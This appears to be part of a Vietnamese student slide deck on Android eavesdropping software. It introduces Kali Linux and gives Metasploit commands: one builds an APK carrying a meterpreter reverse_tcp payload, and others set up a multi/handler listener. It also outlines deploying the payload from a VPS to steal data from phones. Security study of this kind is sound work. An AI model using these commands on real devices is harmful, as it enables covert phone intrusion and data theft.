6. Giới thiệu đề tài và lí do chọn
* đề tài: nghiên cứu các phần mềm cho phép
nghe lén trên điện thoại sử dụng android
* Lý do chọn:
- hệ điều hành android phát triển mạnh
- Điện thoại android ngày càng nhiều
- Nhu cầu bảo mật thông tin
6
7. Quá trình thực hiện đề tài
• Thực hiện trên local host
- cài đặt và nghiên cứu kali
- Tạo mã xâm nhập trên kali
- Cách triển khai mã xâm nhập trên kali
• Thực hiện trên VPS
- Cài đặt metasploit trên VPS
- Tạo mã xâm nhập
- Triển khai và xâm nhập vào
điện thoại android để đánh cắp thông tin
7
8. Thực hiện trên local host
* Cài đặt và nghiên cứu kali
- Kali là gì ?
Kali là hệ điều hành được sử dụng trong
lĩnh vực bảo mật
- Điểm nổi bật của kali (backtrack)
+ dựa trên nền tảng Debian
+ hỗ trợ mạng không dây tốt
+ khả năng tùy biến cao
+ dễ nâng cấp
8
10. Thực hiện trên local host
- Tạo mã xâm nhập trên kali
+ Mở terminal từ kali, sử dụng lện
Msfpayload android/meterpreter/reverse_tcp
lhost=(ip máy kali) lport=(port chưa được sử dụng)
R > /root/Desktop/tenfile.apk
10
11. Thực hiện trên local host
- Cách triển khai mã xâm nhập trên kali
+ Sử dụng lệnh tạo handler nhận tín hiệu từ mã xâm nhập
nhập lệnh :
+ msfconsole
+ use exploit/multi/handler
+ set payload android/meterpreter/reverse_tcp
+ set lhost 192.168.1.4 (ip trùng với địa chỉ ip
lúc tạo fileten.apk)
+ set lport 5784 (port trùng với port lúc tạo fileten.apk)
11
